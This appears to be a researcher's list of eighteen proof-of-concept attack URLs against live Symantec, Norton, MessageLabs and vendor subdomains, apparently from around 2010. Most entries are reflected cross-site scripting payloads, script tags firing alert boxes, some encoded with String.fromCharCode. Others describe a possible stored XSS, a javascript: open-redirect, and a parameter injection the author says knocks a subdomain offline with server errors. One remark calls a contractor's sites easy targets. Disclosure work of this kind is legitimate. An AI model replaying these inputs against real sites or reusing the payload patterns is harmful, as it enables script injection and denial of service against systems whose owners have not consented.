(1)

https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&LASTNAME=qqqq&COMPANY=qqqq&JOBTITLE=Vice+President&ADDRESS1=qqqq&ADDRESS2=qqqq&CITY=qqqq&STATEPROVINCE=AK&COUNTRY=United+States+of

+America&POSTALCODE=90210&PHONENUMBER=999&EMAIL=qqqq%40aaa&COMPANYSIZE=1+to+10&QUESTION=0659ttm</textarea> <br /><script>alert(‘The TestManager SymanTec Xss SubFinder

Test’)</script>&button=Submit&_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&_EMailFields_=EMAIL&_Real

Fields_=&_IntegerFields_=&_BannedFields_=TRUE&_ID_=symc.2114.-2&Campaign_=JK_Form_RequestSalesCall_MASTER&charset_=UTF-8&_InlineResponseRule_=true&_Sent_=2010-08-23+16%3A19%3A41.610&ACTIVITYCODE=92078&EMail_

=92078&__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDD

EN_FIELD_NAMES__

(2)

http://www.symantec.com/connect/search?filters=01a1ttm–”);</script><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,

117,98,70,105,110,100,101,114,32,84,101,115,116))</script>

(3) https://et.symantec.com/signup/thanks.html?fn=ttm</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&em=aaaa@aaa.c

(4) http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm–”></form><script>alert(‘The Test Manager.com Sub Finder Symantec Test’)</script>&EmailAddress=&password=

(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&_requestid=99999
and into the email box type
“><</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>
you should get an error which states invalid email address entered.
Now change the URL to

https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&success=yes&_requestid=99999

and Bingo XSS (is it being stored? making it a sotred XSS – I don’t think so but not 100% sure)

(6) http://www.symantec.com/business/support/knowledge_base_results.jsp?SearchTerm=ttm”/><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&ddProduct=&pid=&content=all

(7) open redirect to XSS – http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(‘The Test Manager Sub Finder Symantec XSS Test’) – Seems to only work in Firefox? , and not in IE?

(8) http://www.symantec.com/connect/forward?path=2e6fttm–”);</script><script>alert(‘The Test Manager XSS Test for Sub FInder’)</script>

(9)

https://symantecevents.verite.com/?action=main.dsp_register&error=42f2ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,1

15,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>
Site development on the above seems to have outsourced to http://verite.com/our-work/by-client/client-focus/?client_id=2& – I’m guessing all of their sites for symantec would be easy targets.

(10)

http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&SrvURL=&type=10&strName=a&strEmail=ttm–%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%

3E&topic=symantec&strBODY=aaa&submit2=Send

(11)

https://symantecevents.verite.com/?action=event.dsp_cancel&event_id=17895&error=ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,

99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>test

(12) http://aka-community.symantec.com/lib/jsp/socialbookmarkingjs.jsp?lg=en&ct=us&segment=ttm–”);</script><script>alert(‘The Test Manager Xss Test using Sub Finder on Symantec’)</script>

(13) https://careers.symantec.com/psc/jobs/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?4210ttm–”;</script><script>alert(‘the test manager xss test of sub finder on Symantec’)</script>test& (may need to visit page

twice as the first time sets the cookie)

(14) https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=05edttm–”><script>alert(‘XSS TEST’)</script>&lg=en&noqcode=

(15) https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=0d07ttm–”><script>alert(‘The Test Manager Subfinder Xss

Symantec’)</script>&PASSWD=a&CONFIRM_PASSWD=a&a_id=48182&s_id=70&p_id=null&COMMAND_DESTINATION_URL=null&REDIRECT_PAGE=null&p_locale=en_US&l_id=&article_title=Results&t_id=62243672&t_s=1283128779469&EMAIL_AS_

USER_FLAG=Y&FRM_ACTION=Create+Account&ru=null

(16) http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E

(17) Ouch DOS via Bad Param Injection = http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise = which works fine as do all other URLs on this techcenter subdomain.
However if I now use the url = http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.

(18) http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=1f10ttm–”><script>alert(‘The Test Manager XSS Sub Finder Tool Test’)</script>&rule=any&page=2

---